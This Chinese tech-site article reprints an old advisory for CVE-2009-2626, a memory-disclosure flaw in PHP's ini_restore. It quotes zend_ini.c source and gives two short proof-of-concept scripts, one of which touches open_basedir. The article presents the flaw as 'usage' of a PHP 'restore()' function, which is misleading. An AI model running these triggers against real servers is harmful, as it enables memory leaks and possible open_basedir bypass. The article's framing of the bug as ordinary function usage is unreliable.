PHP函数restore()重置PHP配置环境

开发 后端
我们可以运用PHP函数restore()重置PHP配置环境时PG()类中的变量会显示任意部分的内存。我们给出了详细的使用方法,希望对大家有所帮助。

PHP作为一种功能强大的HTML嵌入式语言受到广泛的运用,尤其适合于WEB开发中。下面我们将为大家详细介绍有关PHP函数restore()的相关用法。#t#

影响版本:
PHP PHP 5.3.0
PHP PHP 5.2.10漏洞描述:
BUGTRAQ ID: 36009
CVE ID: CVE-2009-2626

在使用PHP函数restore()重置PHP配置环境时PG()类中的变量会显示任意部分的内存。如果要利用这个漏洞,攻击者必须要通过ini_set()函数声明变量。

- ---zend_ini.c---

  1. static int zend_restore_ini_entry_cb
    (zend_ini_entry *ini_entry, int stage  
  2. TSRMLS_DC) /* {{{ */  
  3. {  
  4. if (ini_entry->modified) {  
  5. if (ini_entry->on_modify) {  
  6. zend_try {  
  7. /* even if on_modify bails out, we 
    have to continue on with restoring,  
  8. since there can be allocated variables 
    that would be freed on MM  
  9. shutdown  
  10. and would lead to memory corruption 
    later ini entry is modified again  
  11. */  
  12. ini_entry->on_modify(ini_entry, 
    ini_entry-
    >orig_value,  
  13. ini_entry->orig_value_length, 
    ini_entry-
    >mh_arg1, ini_entry->mh_arg2,  
  14. ini_entry->mh_arg3, stage TSRMLS_CC);  
  15. } zend_end_try();  
  16. }  
  17. if (ini_entry->value != ini_entry
    -
    >orig_value) {  
  18. efree(ini_entry->value);  
  19. }  
  20. ini_entry->value = ini_entry->
    orig_value;  
  21. ini_entry->value_length = 
    ini_entry->orig_value_length;  
  22. ini_entry->modified = 0;  
  23. ini_entry->orig_value = NULL;  
  24. ini_entry->orig_value_length = 0;  
  25. if (ini_entry->modifiable >= (1 << 3)) {  
  26. ini_entry->modifiable >>= 3;  
  27. }  
  28. }  
  29. return 0;  

- ---zend_ini.c---

PHP函数restore()所修改的标记会被重置。由于没有检查ini_entry->on_modify()的值,PG()会超出内存范围。

PHP函数restore()测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. < ?php  
  2. ini_set("session.save_path", 
    "0123456789ABCDEF");  
  3. ini_restore("session.save_path");  
  4. session_start();  
  5. ?> 
  1. < ?php  
  2. ini_set("open_basedir", "A");  
  3. ini_restore("open_basedir");  
  4. ini_get("open_basedir");  
  5. include("B");  
  6. ?> 

以上就是PHP函数restore()的相关使用方法。

责任编辑:曹凯 来源: 百度博客
相关推荐

2011-03-21 11:43:45

LAMPPHP

2009-12-03 13:10:06

2010-01-07 16:50:54

Linux配置PHP环

2009-11-17 09:32:32

PHP数值函数

2009-12-09 17:14:06

PHP unset()

2009-12-09 16:28:32

PHP路径函数

2009-12-07 14:44:27

PHP文件函数

2009-12-08 11:10:20

PHP GD库函数

2009-12-11 17:39:47

PHP String函

2009-12-08 19:24:09

PHP函数索引

2009-11-18 10:22:14

PHP substr

2013-07-26 14:59:13

2009-11-25 09:56:06

PHP数组处理函数

2009-12-11 17:45:09

PHP Math函数

2011-09-02 10:20:00

PHP

2015-01-04 09:49:37

PHPDocker开发环境

2011-05-11 17:40:30

PHP正则表达式

2009-11-17 14:13:34

PHP配置

2009-12-08 09:51:10

PHP intval函

2009-11-30 15:58:13

PHP数学函数
点赞
收藏

51CTO技术栈公众号